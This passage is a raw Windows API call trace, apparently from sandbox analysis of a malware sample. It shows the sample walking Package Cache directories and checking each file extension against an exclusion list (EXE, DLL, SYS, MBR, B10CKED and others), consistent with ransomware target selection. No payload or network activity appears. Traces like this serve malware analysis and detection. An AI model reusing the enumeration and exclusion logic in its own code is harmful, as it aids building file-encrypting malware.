lpFindFileData=0x12ebcc) returned 0 [0110.438] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.438] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.438] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.438] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.438] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.438] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.438] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.438] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", 
cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{33D1FD90-4274-48A1-9BC1-97E33D9C2D6F}\\") returned 0x48 [0110.439] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0110.439] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.439] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.439] CharUpperBuffW (in: lpsz="rsm", cchLength=0x3 | out: lpsz="RSM") returned 0x3 [0110.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="RSM", cchCount2=3) 
returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="NFO", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="RSM", cchCount2=3) returned 
3 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="RSM", cchCount2=3) returned 3 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="RSM", cchCount2=3) returned 3 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="RSM", cchCount2=3) returned 3 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="RSM", cchCount2=3) returned 1 [0110.441] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.441] CharUpperBuffW (in: lpsz="exe", cchLength=0x3 | out: lpsz="EXE") 
returned 0x3 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="EXE", cchCount2=3) returned 1 [0110.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="EXE", cchCount2=3) returned 1 [0110.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="EXE", cchCount2=3) returned 1 [0110.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="EXE", cchCount2=3) returned 2 [0110.442] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.442] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.442] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package 
Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\", cchLength=0x54 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\") returned 0x54 [0110.442] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0110.443] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.443] 
FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL 
USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.443] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", cchLength=0x5d | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{582EA838-9199-3518-A05C-DB09462F68EC}V14.10.25017\\PACKAGES\\") returned 0x5d [0110.444] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.444] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.445] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.445] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.445] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.445] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.445] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0110.445] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0110.445] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.445] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.448] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.448] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0110.448] FindClose (in: hFindFile=0x1c7fa8 | out: 
